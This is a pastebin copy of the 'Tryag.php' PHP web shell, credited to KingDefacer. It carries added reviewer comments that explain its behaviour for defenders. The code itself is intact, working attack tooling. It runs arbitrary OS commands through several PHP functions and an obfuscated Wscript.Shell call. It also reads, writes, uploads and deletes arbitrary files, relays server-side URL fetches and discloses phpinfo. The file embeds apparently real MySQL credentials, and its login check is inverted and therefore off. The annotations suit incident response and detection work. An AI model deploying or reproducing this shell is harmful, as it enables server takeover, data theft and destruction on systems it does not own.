
Untitled

a guest
Jul 3rd, 2018
  1.  
  2. /******************************************************************************************************/
  3. /* Tryag.php - Edited By KingDefacer
  4. /* ??U?E C??C?? C???E?:
  5. /* by: 1.0 (03.10.2006)
  6. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
  7. /*
  8. /*
  9. /* KingDefacer@msn.com
  10. /******************************************************************************************************/
  11. /* ~~~ C?I?C?CE | C?I?C?CE ~~~ */
  12.  
  13. // ?EOU?? ???E C???? C???? C? E????? | Authentification
  14. // $auth = 1; - C???? ?C?I ?EOU?? C???? C???? ( authentification = On )
  15. // $auth = 0; - C???? ??? ?E???? C???? C???? ( authentification = Off )
  16. $auth = 1;
  17.  
  18. // (Login & Password for access)
  19. // !!! (CHANGE THIS!!!)
  20. // md5, C?EC???I ?C????? ?E? EO????? EUU 'tryag'
  21. // Login and password are stored as MD5 hashes (not encrypted); the default for both is 'tryag'
  22. $name='7c7f0f5f0f9e774ec437e1077e6c84a7'; // C????? C??O?? (user login)
  23. $pass='7c7f0f5f0f9e774ec437e1077e6c84a7'; // C?EC???I C??O?? (user password)
  24. /******************************************************************************************************/
  // HTTP Basic authentication gate for everything below.
  // NOTE(review): the gate runs only when $auth == 0, although the comments above describe
  // $auth = 1 as "authentification = On". With the $auth = 1 assigned above, this block is
  // skipped and no credential check is performed at all. For incident response, a copy deployed
  // with these defaults should be assumed reachable by any party that knows its URL, not only
  // by whoever planted it.
  25. if($auth == 0) {
  // The supplied user name and password are hashed with unsalted MD5 and compared to $name / $pass,
  // which hold the same digest (documented above as the default 'tryag').
  // NOTE(review): when PHP_AUTH_USER is set but PHP_AUTH_PW is not, md5() is applied to an
  // undefined index.
  26. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  27. {
  // Missing or wrong credentials: send a Basic-auth challenge with a 401 status and stop.
  28. header('WWW-Authenticate: Basic realm="??? ?C?? ?C???E??"');
  29. header('HTTP/1.0 401 Unauthorized');
  30. exit("<b><a href=http://>tryag-team</a> : C?II?? ?U ???O E??C? ??? :)</b>");
  31. }
  32. }
  33. ?>
  34.  
  35.  
  36. <html>
  37. <head>
  38. <title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>
  39. <body bgcolor="#000000">
  40. <table Width='100%' height='10%' bgcolor='#AA0000' border='1'>
  41. <tr>
  42. <td><center><font size='6' color='#BBB516'></font></center></td>
  43. </tr>
  44. </table>
  45. <style type="text/css">
  46. body, td {
  47. font-family: "Tahoma";
  48. font-size: "12px";
  49. line-height: "150%";
  50. }
  51. .smlfont {
  52. font-family: "Tahoma";
  53. font-size: "11px";
  54. }
  55. .INPUT {
  56. FONT-SIZE: "12px";
  57. COLOR: "#000000";
  58. BACKGROUND-COLOR: "#FFFFFF";
  59. height: "18px";
  60. border: 1px solid #666666 none;
  61. padding-left: "2px"
  62. }
  63. .redfont {
  64. COLOR: "#A60000";
  65. }
  66. a:link, a:visited, a:active {
  67. color: "#FF0000";
  68. text-decoration: underline;
  69. }
  70. a:hover {
  71. color: "#FFFFFF";
  72. text-decoration: none;
  73. }
  74. .top {BACKGROUND-COLOR: "#AA0000"}
  75. .firstalt {BACKGROUND-COLOR: "#000000"}
  76. .secondalt {BACKGROUND-COLOR: "#000000"}
  77. </style>
  78. <SCRIPT language=JavaScript>
  /**
   * Copy the state of the form's "chkall" checkbox onto every other control in the form.
   *
   * @param {object} form  Form whose `elements` are updated and whose `chkall` control is read.
   */
  function CheckAll(form) {
    var controls = form.elements;
    var idx = 0;
    while (idx < controls.length) {
      var control = controls[idx];
      // The master checkbox itself is left untouched.
      if (control.name != 'chkall') {
        control.checked = form.chkall.checked;
      }
      idx += 1;
    }
  }
  /**
   * Ask for confirmation and, if given, navigate to the delete URL for a directory or a file.
   *
   * @param {string} d  Value placed in the `dir` query parameter.
   * @param {string} f  Name placed in the `deldir` or `delfile` query parameter.
   * @param {string} m  Text shown in the confirmation dialog.
   * @param {number} t  1 selects `deldir`; any other value selects `delfile`.
   *
   * Both d and f are concatenated into the URL without encoding.
   */
  function really(d, f, m, t) {
    if (!confirm(m)) {
      return;
    }
    var key = (t == 1) ? '&deldir=' : '&delfile=';
    window.location.href = '?dir=' + d + key + f;
  }
  95. </SCRIPT>
  96. </head>
  97.  
  98. <body>
  99. <center>
  100.  
  101. <hr width="775" noshade>
  102. <table width="775" border="0" cellpadding="0">
  103. <?PHP
  104.  
  105.  
  106.  
  // Bootstrap: error level, output buffering, start timestamp and request-variable import.
  // 7 = E_ERROR | E_WARNING | E_PARSE, so notices (for example undefined variables) are not reported.
  107. error_reporting(7);
  108. ob_start();
  // Start time in seconds, built from the "usec sec" string that microtime() returns; debuginfo() reads it.
  109. $mtime = explode(' ', microtime());
  110. $starttime = $mtime[1] + $mtime[0];
  // Emulate register_globals when it is off: every POST parameter, then every GET parameter, becomes a
  // variable in this scope. EXTR_SKIP never overwrites an existing variable, so POST wins over GET and
  // variables assigned earlier in the file are kept. Later code depends on this for names it never
  // assigns itself, such as $execfunc, $content, $doupfile and $uploaddir. The "@" hides any warning.
  111. $onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
  112. if ($onoff != 1) {
  113. @extract($_POST, EXTR_SKIP);
  114. @extract($_GET, EXTR_SKIP);
  115. }
  // Working directory, script path and the disable_functions ini value, captured for later use.
  116. $mohajer = getcwd();
  117. $self = $_SERVER['PHP_SELF'];
  118. $dis_func = get_cfg_var("disable_functions");
  119.  
  120. ///////////////////////////////
  121. //
  // Hard-coded MySQL connection settings. The "read file SQL" handler further down passes
  // $mhost / $muser / $mpass to mysql_connect() and selects $mdb; $mysql_use is not read in the
  // visible part of the file.
  // NOTE(review): these look like real account values embedded in the sample rather than
  // placeholders. If they belong to an environment you operate, treat them as compromised and rotate them.
  122. $mysql_use = "no"; //"yes" //
  123. $mhost = "localhost"; //
  124. $muser = "mjalnet_mjal"; //
  125. $mpass = "99080806"; //
  126. $mdb = "mjalnet_vb"; //
  127. //
  128. ///////////////////////////////
  129.  
  130.  
  // When magic_quotes_gpc is active, strip its backslash escaping from the GET and POST superglobals.
  // The extract() calls above have already run, so the variables they created keep the escaped values;
  // only $_GET / $_POST are cleaned here.
  // NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0, so this call is fatal on current PHP.
  131. if (get_magic_quotes_gpc()) {
  132. $_GET = stripslashes_array($_GET);
  133. $_POST = stripslashes_array($_POST);
  134. }
  135.  
  136.  
  137.  
  // POST parameter "phpinfo": print the full phpinfo() page and stop, unless the string "phpinfo"
  // occurs (case-insensitively) in the disable_functions value, in which case only the literal
  // text "phpinfo()" is printed. phpinfo() emits its own output and returns a boolean, which is what
  // ends up echoed and stored in $phpinfo.
  // Defender view: this discloses interpreter version, loaded modules, paths and environment to the caller.
  // NOTE(review): eregi() was removed in PHP 7.0.
  138. if (empty($_POST['phpinfo'] )) {
  139. }else{
  140. echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
  141. exit;
  142. }
  143.  
  144.  
  // POST parameter "url": fetch whatever it names with file_get_contents() and echo the result raw,
  // then stop. file_get_contents() accepts local paths and stream wrappers as well as http(s) URLs, so
  // this acts both as an outbound-request relay from the server and as a raw file reader.
  // The "@" hides errors; a falsy result (failure or empty body) prints the fallback HTML instead.
  // Defender view: the response body is unescaped, and the outbound fetch originates from the web
  // server's address. Egress filtering and allow_url_fopen=Off limit the remote half.
  145. if (isset($_POST['url'])) {
  146. $proxycontents = @file_get_contents($_POST['url']);
  147. echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>»?E? URL ??E?E§°U</b></p></center></body>";
  148. exit;
  149. }
  150.  
  151. if (empty($_POST['TrYaG'] ) ) {
  152. }ELSE{
  153. $action = '?action=TrYaG';
  154. echo "<table Width='100%' height='10%' bgcolor='#000000' border='1'><tr><td><center><font size='6' color='#BBB516'>
  155. C??C?? C???E?<br><br>
  156. 020 <br><br>
  157. C???C??22 <br><br>
  158. CE????C? <br><br>
  159. ??CE? U?? <br><br>
  160. cRiMiNaL NeT <br><br>
  161. MR.WOLF <br><br>
  162. ?EIC???00 <br><br>
  163. ????I ??? <br><br>
  164. ?C?? C????I <br><br>
  165. al3iznet <br><br>
  166. C???O C??C??<br><br>
  167. ???? C????? ????UE <br><br>
  168. ??U?E C??C?? C???E? & E??C? C???E <br><br>
  169. www.CyberGrup.Org/vb <br><br>
  170. ???? EC???? E? C??? ?I? C?C?? ???? C??? ?? <br><br>";
  171.  
  172.  
  173. echo "</font></center></td></tr></table> ";
  174.  
  175. exit;
  176. }
  // Command-execution handler: runs when the POST parameter "command" is non-empty, renders the
  // command form, executes the submitted string and exits.
  // Defender view: the request value is passed unchanged to an OS command function chosen by the
  // "execfunc" parameter, and the output is written into the page without HTML escaping. It is
  // observable as POST bodies carrying command= / execfunc= to a PHP file and as the web server's PHP
  // worker spawning a shell or cmd.exe. Listing system, passthru, exec, shell_exec and popen in
  // disable_functions removes the PHP entry points used here.
  177. if (empty($_POST['command'] ) ) {
  178. }ELSE{
  179. if (substr(PHP_OS, 0, 3) == 'WIN') {
  // $program and $prog are assigned but not used again in the visible code. $pathname is only
  // assigned further down the file, after this branch has exited, so the default $prog is built
  // with an empty path unless a variable of that name was imported by extract().
  180. $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
  181. $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
  182.  
  183. echo "</form>\n";
  184. }
  185. $tb = new FORMS;
  186.  
  // Page header row: host name, working directory and the caller's address, followed by the button bar.
  187. $tb->tableheader();
  188. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
  189. $tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
  190. $tb->tablefooter();
  191. $tb->tableheader();
  192. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top');
  193. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  194.  
  // Selectable execution back ends; the Wscript.Shell entry is offered only when PHP_OS starts with "WIN".
  195. $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
  196. $tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
  197.  
  198. echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
  199.  
  // $execfunc is never assigned in this file; it arrives as a request parameter through the extract()
  // calls near the top. Any value other than the five named below falls through to system().
  200. if ($_POST['command'] ) {
  201.  
  202. if ($execfunc=="system") {
  203. system($_POST['command']);
  204. } elseif ($execfunc=="passthru") {
  205. passthru($_POST['command']);
  206. } elseif ($execfunc=="exec") {
  // exec() returns only the last line of the command's output.
  207. $result = exec($_POST['command']);
  208. echo $result;
  209. } elseif ($execfunc=="shell_exec") {
  210. $result=shell_exec($_POST['command']);
  211. echo $result;
  212. } elseif ($execfunc=="popen") {
  // A single fread() of at most 2096 bytes; longer output is cut off.
  213. $pp = popen($_POST['command'], 'r');
  214. $read = fread($pp, 2096);
  215. echo $read;
  216. pclose($pp);
  217. } elseif ($execfunc=="wscript") {
  // The COM class name and "cmd.exe" are assembled from string fragments, presumably so the literals
  // do not appear in the file. Signatures should match the concatenated form as well.
  218. $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
  219. $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
  220. $stdout = $exec->StdOut();
  221. $stroutput = $stdout->ReadAll();
  222. echo $stroutput;
  223. } else {
  224. system($_POST['command']);
  225. }
  226.  
  227. }
  228.  
  229. echo"</textarea></td></tr></form></table>";
  230. exit;
  231. }//end shell
  232.  
  // File viewer/editor: reads the file named by POST "editfile" and shows it in a textarea whose form
  // posts back to the save handler ("savefile" carries the same path).
  // Defender view: any file readable by the PHP process can be displayed this way. The file body is
  // passed through htmlentities(), but the file name is written into the page unescaped in two places.
  233. if ($_POST['editfile']){
  // The handle from fopen() is only closed again at the end; the content is read separately by file().
  234. $fp = fopen($_POST['editfile'], "r");
  235. $filearr = file($_POST['editfile']);
  236.  
  // $content is not initialised here, so a "content" request parameter imported by extract() would be
  // prepended to the file text.
  237. foreach ($filearr as $string){
  238.  
  239. $content = $content . $string;
  240. }
  241.  
  242. echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUEST_URI' method='POST'><textarea name=content cols=122 rows=20>";echo htmlentities($content); echo"</textarea>";
  243. echo"<input type='hidden' name='dir' value='" . getcwd() ."'>
  244. <input type='hidden' name='savefile' value='{$_POST['editfile']}'><br>
  245. <input type='submit' name='submit' value='Save'></form></center>";
  246.  
  247. fclose($fp);
  248. }
  249.  
  250.  
  // Save handler: opens the path in POST "savefile" for writing (truncating it) and writes $content,
  // which is the "content" request parameter imported by extract().
  // Defender view: this creates or overwrites any file the PHP process may write, including new
  // scripts under the web root. File-integrity monitoring and a web root that is not writable by the
  // PHP user are the relevant controls.
  // NOTE(review): the fopen() result is not checked and the success message is printed regardless;
  // stripslashes() is applied unconditionally, so backslashes in the submitted text are removed
  // even when magic quotes are off.
  251. if($_POST['savefile']){
  252.  
  253. $fp = fopen($_POST['savefile'], "w");
  254. $content = stripslashes($content);
  255. fwrite($fp, $content);
  256. fclose($fp);
  257. echo "<center><div id=logostrip>Successfully saved!</div></center>";
  258.  
  259. }
  // Upload and mkdir handlers. $doupfile, $uploaddir, $createdirectory, $newdirectory and $dir are
  // request parameters imported by extract().
  // Upload: the temporary upload is copied to "$uploaddir/<client-supplied file name>" with copy()
  // rather than move_uploaded_file(); neither the directory nor the name is validated.
  // Defender view: the destination and extension are fully caller-controlled. Watch for new files
  // appearing in web-served directories.
  260. if ($doupfile) {
  261. echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "EI?«?E?¦!" : "EI?«E§°U!";
  262. }
  263.  
  264.  
  // Make directory: refuses when the path already exists; otherwise creates it and sets mode 0777
  // (world-writable) with both mkdir() and chmod().
  265. elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
  266. if (!empty($newdirectory)) {
  267. $mkdirs="$dir/$newdirectory";
  268. if (file_exists("$mkdirs")) {
  269. echo "can't make dir";
  270. } else {
  271. echo (@mkdir("$mkdirs",0777)) ? "ok" : "";
  272. @chmod("$mkdirs",0777);
  273. }
  274. }
  275. }
  276.  
  277. /////////
  278. $pathname=str_replace('\\','/',dirname(__FILE__));
  279.  
  280. ////////
  281. if (!isset($dir) or empty($dir)) {
  282. $dir = ".";
  283. $nowpath = getPath($pathname, $dir);
  284. } else {
  285. $dir=$_post['dir'];
  286. $nowpath = getPath($pathname, $dir);
  287. }
  288.  
  289. ///////
  290. $dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm";
  291. $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
  292. $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"mohajer22</a>" : "";
  293.  
  294. $tb = new FORMS;
  295.  
  296. $tb->tableheader();
  297. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
  298. $tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
  299. $tb->tablefooter();
  300. $tb->tableheader();
  301. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Editfile or make & Uploud file & Make directory</b></td></tr></table>','center','top');
  302. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  303. $tb->headerform(array('content'=>'<FONT COLOR=RED>File to edit or make:</FONT>'.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','editfile','','submit')));
  304.  
  305.  
  306. $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'<FONT COLOR=RED>Uploud file:</FONT>'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','up','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
  307.  
  308. $tb->headerform(array('content'=>'<FONT COLOR=RED>Make directory:</FONT> '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','newdirectory','','submit')));
  309. $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
  310. $tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
  311.  
  312. $tb->tdbody ("</td></tr></table>");
  313. if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
  314.  
  315.  
  316. $tb->tableheader();
  317. echo"<tr bgcolor='#AA0000'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>";
  318.  
  319. $dirs=@opendir($dir);
  320. $dir_i = '0';
  321. while ($file=@readdir($dirs)) {
  322. $filepath="$dir/$file";
  323. $a=@is_dir($filepath);
  324. if($a=="1"){
  325. if($file!=".." && $file!=".") {
  326. $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
  327. $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
  328. $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
  329. echo "<tr class=".getrowbg().">\n";
  330. echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
  331. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
  332. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
  333. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">&lt;dir&gt;</span></td>\n";
  334. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$dirperm</span></td>\n";
  335. echo "</tr>\n";
  336. $dir_i++;
  337. } else {
  338. if($file=="..") {
  339. echo "<tr class=".getrowbg().">\n";
  340. echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Up dir</a></td>\n";
  341. echo "</tr>\n";
  342. }
  343. }
  344. }
  345. }// while
  346. @closedir($dirs);
  347.  
  348. echo"<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></tr><FORM method='POST'>";
  349.  
  350. $dirs=@opendir($dir);
  351. $file_i = '0';
  352. while ($file=@readdir($dirs)) {
  353. $filepath="$dir/$file";
  354. $a=@is_dir($filepath);
  355. if($a=="0"){
  356. $size=@filesize($filepath);
  357. $size=$size/1024 ;
  358. $size= @number_format($size, 3);
  359. if (@filectime($filepath) == @filemtime($filepath)) {
  360. $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
  361. $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
  362. } else {
  363. $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
  364. $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
  365. }
  366. @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
  367. echo "<tr class=".getrowbg().">\n";
  368. echo " <td style=\"padding-left: 5px;\">";
  369. echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
  370. echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
  371. if ($file == 'config.php') {
  372.  
  373. echo "<a href=\"$filepath\" target=\"_blank\"><font color='yellow'>$file<STRONG></STRONG></a></td>\n";
  374. }
  375. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
  376. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
  377. echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
  378. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$fileperm</span></td>\n";
  379. echo "</tr>\n";
  380. $file_i++;
  381.  
  382.  
  383. }
  384. }// while
  385. @closedir($dirs);
  386.  
  387. echo "</FORM>\n";
  388. echo "</table>\n";
  389. }// end dir
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  /**
   * Print how long the request has been running.
   *
   * Reads the global $starttime (seconds, as computed from microtime() at start-up) and echoes
   * the difference to the current time with six decimals. Returns nothing.
   */
  function debuginfo() {
      global $starttime;
      // microtime() without arguments yields "fraction seconds" as one string.
      list($fraction, $seconds) = explode(' ', microtime());
      $elapsed = $seconds + $fraction - $starttime;
      $totaltime = number_format($elapsed, 6);
      echo "Processed in " . $totaltime . " second(s)";
  }
  403.  
  404.  
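  /**
   * Recursively remove backslash escaping (as added by magic quotes) from an array of request data.
   *
   * Keys named "argc" or "argv" are skipped, as are keys that are entirely upper-case and not
   * integer-like; every other string value is passed through stripslashes() and nested arrays are
   * processed the same way.
   *
   * Changes from the earlier version: iteration uses foreach instead of each(), which was removed
   * in PHP 8.0, and keys are compared as strings so an integer key 0 is no longer treated as equal
   * to 'argc' on PHP versions before 8.
   *
   * @param array $array Array to clean; modified in place.
   * @return array The cleaned array.
   */
  function stripslashes_array(&$array) {
      foreach ($array as $key => $var) {
          $name = (string) $key;
          if ($name === 'argc' || $name === 'argv') {
              continue;
          }
          $isIntegerKey = ((string) intval($name) === $name);
          // All-caps, non-numeric keys are left alone.
          if (strtoupper($name) === $name && !$isIntegerKey) {
              continue;
          }
          if (is_string($var)) {
              $array[$key] = stripslashes($var);
          } elseif (is_array($var)) {
              $array[$key] = stripslashes_array($var);
          }
      }
      return $array;
  }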
  418.  
  419.  
  /**
   * Recursively delete a directory and everything below it.
   *
   * Each sub-directory and file is first set to mode 0777, then removed; finally the directory
   * itself is set to 0777 and removed with rmdir(). Errors from chmod/unlink/rmdir are suppressed.
   *
   * NOTE(review): the result of dir() is not checked before read() is called on it, and the loop
   * stops at the first entry whose name evaluates as false (for example "0").
   *
   * @param string $deldir Directory to remove.
   * @return int 1 when the final rmdir() succeeded, 0 otherwise.
   */
  function deltree($deldir) {
      $handle = @dir($deldir);
      while ($entry = $handle->read()) {
          $target = "$deldir/$entry";
          if ($entry != "." && $entry != ".." && is_dir($target)) {
              @chmod($target, 0777);
              deltree($target);
          }
          if (is_file($target)) {
              @chmod($target, 0777);
              @unlink($target);
          }
      }
      $handle->close();
      @chmod("$deldir", 0777);
      if (@rmdir($deldir)) {
          return 1;
      }
      return 0;
  }
  436.  
  437.  
  /**
   * Probe whether files can be created in a directory.
   *
   * If the path is not a directory, an attempt is made to create it with mode 0777. The probe then
   * opens "<dir>/test.txt" for writing, closes it and deletes it.
   *
   * Side effects worth knowing when reviewing a host: a missing directory is created and left in
   * place, and an existing test.txt in that directory is truncated and then removed.
   *
   * @param string $dir Directory to test.
   * @return int|null 1 if the probe file could be opened, 0 if not; unset (null) when the path
   *                  is still not a directory after the mkdir attempt.
   */
  function dir_writeable($dir) {
      if (!is_dir($dir)) {
          @mkdir($dir, 0777);
      }
      if (is_dir($dir)) {
          $probe = "$dir/test.txt";
          $fp = @fopen($probe, 'w');
          if ($fp) {
              @fclose($fp);
              @unlink($probe);
              $writeable = 1;
          } else {
              $writeable = 0;
          }
      }
      return $writeable;
  }
  453.  
  454.  
  /**
   * Return the CSS class for the next table row, alternating between two values.
   *
   * Uses and increments the global $bgcounter: even counts give "firstalt", odd counts "secondalt".
   *
   * @return string "firstalt" or "secondalt".
   */
  function getrowbg() {
      global $bgcounter;
      $isEven = ($bgcounter % 2 == 0);
      $bgcounter++;
      return $isEven ? "firstalt" : "secondalt";
  }
  463.  
  464.  
  /**
   * Resolve a "/"-separated relative path against a base path, purely as text.
   *
   * Empty segments and "." are ignored, ".." drops the last segment collected so far, and any
   * other segment is appended. Nothing is checked against the file system and the result is not
   * confined to the base path: enough ".." segments walk above it.
   *
   * @param string $mainpath     Base path using "/" separators.
   * @param string $relativepath Path to apply on top of it.
   * @return string The combined path.
   */
  function getPath($mainpath, $relativepath) {
      global $dir; // declared as in the original; neither read nor written here
      $resolved = explode('/', $mainpath);
      foreach (explode('/', $relativepath) as $segment) {
          if ($segment == '.' || $segment == '') {
              continue;
          }
          if ($segment == '..') {
              array_pop($resolved);
              continue;
          }
          $resolved[] = $segment;
      }
      return implode('/', $resolved);
  }
  481.  
  482.  
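  /**
   * Return a php.ini setting in display form.
   *
   * Unset or switched-off values (false, '', '0', 0) give "No", switched-on values ('1', 1) give
   * "Yes", and anything else is returned as read.
   *
   * The earlier version used a switch with loose comparison against 0 and 1, so the result depended
   * on the PHP version: before PHP 8 every non-numeric string value (a path, for instance) compared
   * equal to 0 and was reported as "No". The checks here are strict.
   *
   * @param string $varname Name of the configuration directive.
   * @return mixed "No", "Yes", or the raw value from get_cfg_var().
   */
  function getphpcfg($varname) {
      $result = get_cfg_var($varname);
      if ($result === false || $result === '' || $result === '0' || $result === 0) {
          return "No";
      }
      if ($result === '1' || $result === 1) {
          return "Yes";
      }
      return $result;
  }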
  496.  
  497.  
  /**
   * Report whether a function is defined in this PHP runtime.
   *
   * @param string $funName Function name to look up.
   * @return string "Yes" if function_exists() finds it, otherwise "No".
   */
  function getfun($funName) {
      if (function_exists($funName)) {
          return "Yes";
      }
      return "No";
  }
  501.  
  502.  
  503. class PHPZip{
  504. var $out='';
  505. function PHPZip($dir) {
  506. if (@function_exists('gzcompress')) {
  507. $curdir = getcwd();
  508. if (is_array($dir)) $filelist = $dir;
  509. else{
  510. $filelist=$this -> GetFileList($dir);//I?????±?
  511. foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
  512. }
  513. if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
  514. else chdir($curdir);
  515. if (count($filelist)>0){
  516. foreach($filelist as $filename){
  517. if (is_file($filename)){
  518. $fd = fopen ($filename, "r");
  519. $content = @fread ($fd, filesize ($filename));
  520. fclose ($fd);
  521. if (is_array($dir)) $filename = basename($filename);
  522. $this -> addFile($content, $filename);
  523. }
  524. }
  525. $this->out = $this -> file();
  526. chdir($curdir);
  527. }
  528. return 1;
  529. }
  530. else return 0;
  531. }
  532.  
  533.  
  534. function GetFileList($dir){
  535. static $a;
  536. if (is_dir($dir)) {
  537. if ($dh = opendir($dir)) {
  538. while (($file = readdir($dh)) !== false) {
  539. if($file!='.' && $file!='..'){
  540. $f=$dir .'/'. $file;
  541. if(is_dir($f)) $this->GetFileList($f);
  542. $a[]=$f;
  543. }
  544. }
  545. closedir($dh);
  546. }
  547. }
  548. return $a;
  549. }
  550.  
  551. var $datasec = array();
  552. var $ctrl_dir = array();
  553. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  554. var $old_offset = 0;
  555.  
  556. function unix2DosTime($unixtime = 0) {
  557. $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
  558. if ($timearray['year'] < 1980) {
  559. $timearray['year'] = 1980;
  560. $timearray['mon'] = 1;
  561. $timearray['mday'] = 1;
  562. $timearray['hours'] = 0;
  563. $timearray['minutes'] = 0;
  564. $timearray['seconds'] = 0;
  565. } // end if
  566. return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
  567. ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
  568. }
  569.  
  570. function addFile($data, $name, $time = 0) {
  571. $name = str_replace('\\', '/', $name);
  572.  
